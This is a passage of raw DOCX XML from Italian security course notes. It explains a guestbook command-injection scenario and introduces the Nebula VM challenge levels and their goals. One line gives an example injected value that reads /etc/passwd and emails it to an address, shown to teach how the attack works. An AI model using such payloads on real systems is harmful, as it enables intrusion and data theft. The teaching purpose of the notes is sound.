      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Applicazione web "guestbook" che accetta brevi messaggi dagli utenti</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Ciascun messaggio è salvato su un file che viene "letto" (interpretato) dal server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030a0"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Cosa succede se un attacker inserisce:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030a0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /etc/passwd | email dario.stabili@unimore.it #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:color w:val="7030a0"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:color w:val="7030a0"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="712"/>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:color w:val="262626" w:themeColor="text1" w:themeTint="D9"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
        </w:rPr>
        <w:t xml:space="preserve">Local Injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:color w:val="262626" w:themeColor="text1" w:themeTint="D9"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="718"/>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Nebula VM</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t xml:space="preserve">La macchina virtuale Nebula contiene esercizi di sicurezza basilari</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">.</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highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Nebula è strutturata come una challenge:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Venti esercizi totali (Level01, … Level19)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">In ogni livello è dichiarato un obiettivo non banale che l'utente deve cercare di ottenere </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Giocatori</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">. Un utente che intende partecipare alla sfida si autentica con le credenziali del livello (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">levelN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">, username e password uguali)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Vittime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">. Gli account </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">flagN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">di cui non si hanno le credenziali di accesso (ovviamente) contengono vulnerabilità di vario tipo. Simulano la vittima in questione</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Amministratore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">. Un utente ha impostata l'elevazione manuale dei privilegi a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">tramite il comando </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Dopo l'autenticazione, l'utente </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">levelN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">usa le informazioni contenute nella directory dell'utente </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">flagN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">/home/flagN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve"> per conseguire uno specifico obiettivo: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Eseguire programmi con privilegi elevati</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Ottenere informazioni sensibili</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="734"/>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve">There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:hyperlink r:id="rId11" w:tooltip="https://exploit.education/nebula/level-01/" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="870"/>
            <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
            <w:highlight w:val="none"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="870"/>
            <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="870"/>
            <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
            <w:highlight w:val="none"/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="870"/>
            <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
            <w:highlight w:val="none"/>
          </w:rPr>
          <w:t xml:space="preserve">https://exploit.education/nebula/level-01/</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="870"/>
            <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
            <w:highlight w:val="none"/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="870"/>
            <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="870"/>
            <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
            <w:highlight w:val="none"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="719"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Nebula01</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Obiettivo della sfida</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">: eseguire il comando </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/getflag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve"> con i privilegi dell'utente </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">flag01</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Possiamo fare login direttamente come flag01 ed eseguire il binario?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Serve una password, che non abbiamo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Due casi:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
